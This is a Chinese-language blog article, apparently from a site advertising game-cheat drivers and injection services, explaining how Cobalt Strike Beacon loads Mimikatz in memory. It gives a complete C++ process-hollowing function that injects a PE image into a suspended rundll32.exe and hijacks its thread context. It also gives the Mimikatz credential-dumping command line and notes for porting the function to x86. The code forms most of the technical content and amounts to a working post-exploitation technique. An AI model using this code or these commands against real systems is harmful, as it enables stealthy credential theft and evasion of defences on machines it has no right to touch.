Canvas is not supported in your browser.
首页 课程 文章
无痕注入 APC注入 线程注入 读写驱动 注入技术 句柄表 进程线程 系统调用 保护模式 内存管理 远程CALL 软件调试 驱动封装 云下发 驱动开发 FPS数据 方框透视 FPS方框 FPS自瞄 CE D3DHOOK D3D绘制 Imgui绘制 DWM
内核课程 驱动出租 学习路线 聊天室 免责声明 提问技巧

编程技术-Cobalt Strike 内存加载执行 Mimikatz 命令研究

推荐 原创

周杰伦

文章分类 编程技术 阅读数 : 348 阅读时长 : 9分钟


【编程技术-Cobalt Strike 内存加载执行 Mimikatz 命令研究】此文章归类为:编程技术。

 经过研究发现,Cobalt Strike 很可能通过普通的 cmd 命令终端功能,并结合傀儡进程(又称“进程镂空”)注入功能,完成内存加载执行 Mimikatz 等命令行命令的功能。


01

普通的CMD命令终端


普通的CMD命令终端代码比较简单,可自行百度搜索相关代码。这里仅叙述一下过程:

  1. 使用 CreatePipe 创建匿名管道,设置读、写句柄;

  2. 使用 CreateProcessA 创建进程,用于运行 CMD 命令行程序;将匿名管道“写”句柄应用于进程的标准输出和标准错误,并立即执行进程;

  3. 循环从匿名管道“读”句柄获取 CMD 命令行程序的输出信息。


02

傀儡进程注入


傀儡进程注入,又称“进程镂空注入”,该技术将卸载目标进程的内存镜像,并注入新的PE镜像,并将 CPU 执行流 指向新的 PE 镜像的入口点。

主要注意三点:

  1. PE 镜像对齐方式,由文件对齐转换为内存对齐;

  2. 一般要修复地址重定位表;

  3. 无需填充导入表,由系统自动完成。

傀儡进程注入代码可以参考下面这个不错的 github 项目:

项目描述:x64 项目,通过傀儡进程注入 x86/x64 进程

https://github.com/adamhlt/Process-Hollowing


03

CS Beacon 内存加载 Mimikatz


在内存加载 PE 镜像的时候,EXE 程序具有命令行参数传递的特性,也就是说正在运行的 EXE 程序的命令行参数,会传递给内存加载的 PE 镜像,所以,内存加载的 PE 镜像也同时拥有了当前运行 EXE 程序的命令行参数。

举个例子:

我们使用控制台程序内存加载 Mimikatz,控制台程序文件名为 demo.exe,控制台程序命令行是:“demo.exe privilege::debug sekurlsa::logonpasswords exit”,被内存加载的 Mimikatz 获取的命令行也是:“demo.exe privilege::debug sekurlsa::logonpasswords exit”,但是 Mimikatz 执行命令,并不检测命令行中的文件名是否是自己的文件名,它只关注后面的命令行参数,所以 demo.exe 可以正常执行 Mimikatz 命令。

而本文提到的 CS Beacon 内存加载 Mimikatz 技术,正好利用了 EXE 程序命令行参数传递这点——通过以暂停方式创建新进程 rundll32.exe,并传递命令行参数 “rundll32.exe privilege::debug sekurlsa::logonpasswords exit”,之后,将 Mimikatz 文件数据由文件对齐转换为内存对齐、修复地址重定位表,并将处理后的 Mimikatz 内存数据,导入 rundll32.exe 进程中,修改 rundll32.exe 进程的 CPU 执行流,使其指向 Mimikatz 镜像入口点,最后恢复主线程。这样,Mimikatz 命令就能成功执行了,但是我们需要 Mimikatz 命令回显,没有回显,该技术就没有意义。关于这一点,直接使用原始CMD终端的匿名管道读写句柄技术即可,没有变化,也无需改变。

总结一点,CS Beacon 内存加载 Mimikatz 技术几乎是原始CMD终端技术和傀儡进程注入技术的简单加和。

下面这个函数代码可以说明上述技术思想:

    // x64 Beacon 傀儡进程注入 x64 进程
DWORD RemoteMemoryLoadExecute(const char* szCurDir, const char* cmd, const char* szExeData, string& cmdRetInfo)
{
  const int len = 5120; // 5KB
  char result[len] = {};
  cmdRetInfo = "";

  DWORD dwRead;
  HANDLE hRead = NULL, hWrite = NULL;

  SECURITY_ATTRIBUTES sa = {};
  sa.nLength = sizeof(SECURITY_ATTRIBUTES);
  sa.lpSecurityDescriptor = NULL;
  sa.bInheritHandle = TRUE;

  if (!CreatePipe(&hRead, &hWrite, &sa, 0))
  {
    return GetLastError();
  }

  STARTUPINFO si = {};
  PROCESS_INFORMATION pi = {};
  si.cb = sizeof(si);
  si.wShowWindow = SW_HIDE;
  si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
  si.hStdOutput = hWrite;
  si.hStdError = hWrite;

  if (!CreateProcessA(NULL, (char*)cmd, NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, szCurDir, &si, &pi))
  {
    DWORD dwErr = GetLastError();
    CloseHandle(hRead);
    CloseHandle(hWrite);
    return dwErr; // 进程创建失败
  }


  LPVOID lpLocalMemBaseAddr;
  DWORD dwImageSize;
  DWORD dwErr = LoadToMemory(szExeData, lpLocalMemBaseAddr, dwImageSize);
  if (dwErr != ERROR_SUCCESS)
  {
    return dwErr;
  }

  LPVOID lpRemoteBaseAddr = VirtualAllocEx(pi.hProcess, NULL, dwImageSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
  if (lpRemoteBaseAddr == NULL)
  {
    return GetLastError();
  }

  LPVOID lpRemoteEntryAddress;
  RelocateImage((LPBYTE)lpLocalMemBaseAddr, (LPBYTE)lpRemoteBaseAddr, lpRemoteEntryAddress);

  SIZE_T nSize;
  if (WriteProcessMemory(pi.hProcess, lpRemoteBaseAddr, lpLocalMemBaseAddr, dwImageSize, &nSize) == FALSE) return GetLastError();

  SetCodeSegmentOnReadExec(pi.hProcess, (LPSTR)lpLocalMemBaseAddr, (LPSTR)lpRemoteBaseAddr);
  VirtualFree(lpLocalMemBaseAddr, 0, MEM_RELEASE);

  CONTEXT threadContext = { 0 };
  threadContext.ContextFlags = CONTEXT_FULL;
  if (GetThreadContext(pi.hThread, &threadContext) == FALSE) return GetLastError();

  if (WriteProcessMemory(pi.hProcess, (LPVOID)(threadContext.Rdx + 0x10), &lpRemoteBaseAddr, sizeof(lpRemoteBaseAddr), &nSize) == FALSE) return GetLastError();

  threadContext.Rcx = (DWORD64)lpRemoteEntryAddress;

  if (SetThreadContext(pi.hThread, &threadContext) == FALSE) return GetLastError();

  ResumeThread(pi.hThread);

  WaitForSingleObject(pi.hProcess, 2000);

  CloseHandle(pi.hProcess);
  CloseHandle(pi.hThread);
  CloseHandle(hWrite);

  time_t start_time = time(0);

  while (ReadFile(hRead, result, sizeof(result), &dwRead, NULL))
  {
    string temp(result, dwRead);
    cmdRetInfo += temp;

    Sleep(180);
  }

  CloseHandle(hRead);

  return 0;
}


    04

    备注


    上述方法,讲述了 x64 Beacon 内存加载 x64 Mimikatz 的技术。如果要完成 x64 Beacon 内存加载 x86 EXE 命令行程序的技术,其要点主要有以下几点不同:

    1. 内存加载代码需要x86平台化,不能使用当前的基于x64平台的内存加载代码;

    2. 内存加载的PE基地址,由 threadContext.Rdx+0x10 变为 threadContext.Ebx+0x8;

    3. 内存加载的PE入口点地址,由 threadContext.Rcx 变为 threadContext.Eax;

    4. GetThreadContext -> Wow64GetThreadContext;

    5. SetThreadContext -> Wow64SetThreadContext。

    参考项目:https://github.com/adamhlt/Process-Hollowing


    05

    参考链接


    https://github.com/adamhlt/Process-Hollowing


    06

    声明

    本文所述方法,仅供安全研究使用。凡擅自用于违法用途,将被追究法律责任。其违法行为均与本人无关。特此声明!


    原文链接:



    更多【编程技术-Cobalt Strike 内存加载执行 Mimikatz 命令研究】相关视频教程:www.yxfzedu.com




    相关文章推荐

    记录自己的技术轨迹
    文章规则:
    1):文章标题请尽量与文章内容相符
    2):严禁色情、血腥、暴力
    3):严禁发布任何形式的广告贴
    4):严禁发表关于中国的政治类话题
    5):严格遵守中国互联网法律法规
    6):有侵权,疑问可发邮件至service@yxfzedu.com
    近期原创 更多
    友情链接
    内核结构 FAQ
    免责声明
    课程目录
    Windows内核
    游戏逆向(FPS)
    技术交流QQ群
    342478842 215039827 137189196
    314055665 159620936
    微信公众号
    www.yxfzedu.com是一个分享游戏安全,游戏外挂与反外挂,游戏驱动保护的视频网站!
    接各种驱动定制如:游戏读写驱动,软件内存保护,防止调试等功能定制。
    出租读写驱动,调试驱动,无痕注入支持各种游戏。
    邮箱:service@yxfzedu.com
    QQ:851920120
    特别说明:不接游戏数据分析,外挂编写,登陆协议等类似业务。